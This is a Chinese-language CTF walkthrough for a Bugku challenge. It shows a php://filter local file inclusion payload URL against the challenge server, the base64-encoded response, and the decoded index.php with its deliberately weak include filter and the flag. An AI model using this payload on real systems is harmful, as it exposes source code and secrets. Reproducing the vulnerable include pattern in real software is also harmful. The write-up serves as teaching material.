flag在index里


題目:http://123.206.87.240:8005/post/

 

我們來看這一題  

首先打開題目

他讓點擊就點擊唄

跳轉到另一個新的界面

 

這就沒了???

。。。

沒思路就對了     //假裝證明自己還有進步的空間😆

去偷瞟一下別人的WP

稍微有點思路了

 

 

 

 

 

 

 

 

這道題是  本地文件包含漏洞+php偽協議    的結合應用

 

file關鍵字是提示,說明這題有文件包含漏洞

php的封裝協議:http://php.net/manual/zh/wrappers.php.php

 

 

 

 


 

 

http://123.206.87.240:8005/post/index.php?file=php://filter/read=convert.base64-encode/resource=index.php

 

 首先這是一個file關鍵字的get參數傳遞

php://     是一種協議名稱

php://filter/   是一種訪問本地文件的協議

/read=convert.base64-encode/  表示讀取的方式是base64編碼后

resource=index.php  表示目標文件為index.php

 

 


 

 

 

 

訪問結果:

 

PGh0bWw+DQogICAgPHRpdGxlPkJ1Z2t1LWN0ZjwvdGl0bGU+DQogICAgDQo8P3BocA0KCWVycm9yX3JlcG9ydGluZygwKTsNCglpZighJF9HRVRbZmlsZV0pe2VjaG8gJzxhIGhyZWY9Ii4vaW5kZXgucGhwP2ZpbGU9c2hvdy5waHAiPmNsaWNrIG1lPyBubzwvYT4nO30NCgkkZmlsZT0kX0dFVFsnZmlsZSddOw0KCWlmKHN0cnN0cigkZmlsZSwiLi4vIil8fHN0cmlzdHIoJGZpbGUsICJ0cCIpfHxzdHJpc3RyKCRmaWxlLCJpbnB1dCIpfHxzdHJpc3RyKCRmaWxlLCJkYXRhIikpew0KCQllY2hvICJPaCBubyEiOw0KCQlleGl0KCk7DQoJfQ0KCWluY2x1ZGUoJGZpbGUpOyANCi8vZmxhZzpmbGFne2VkdWxjbmlfZWxpZl9sYWNvbF9zaV9zaWh0fQ0KPz4NCjwvaHRtbD4NCg==

 

 

 

 一大串亂碼??

試試base64解碼

 

 

通過base64位解碼得到 FLAG

 

 

1 <html>
2 <title>Bugku-ctf</title>    
3 <?php
4 error_reporting(0);
5  if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';}
6                      單機跳轉到 ./../show.php
7  $file=$_GET['file'];
8   if(strstr($file,"../")||stristr($file, "tp")||
   stristr($file,"input")||stristr($file,"data")){ 9    當get傳參中出現 ../ tp input data 這些關鍵詞的時 10 echo "Oh no!"; 11  輸出 ·· 12 exit(); 13 結束 14 } 15 include($file); 16 //flag:flag{edulcni_elif_lacol_si_siht} //flag 17 ?> 18 </html>

 

 

 

 

參考:

談一談php://filter的妙用


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM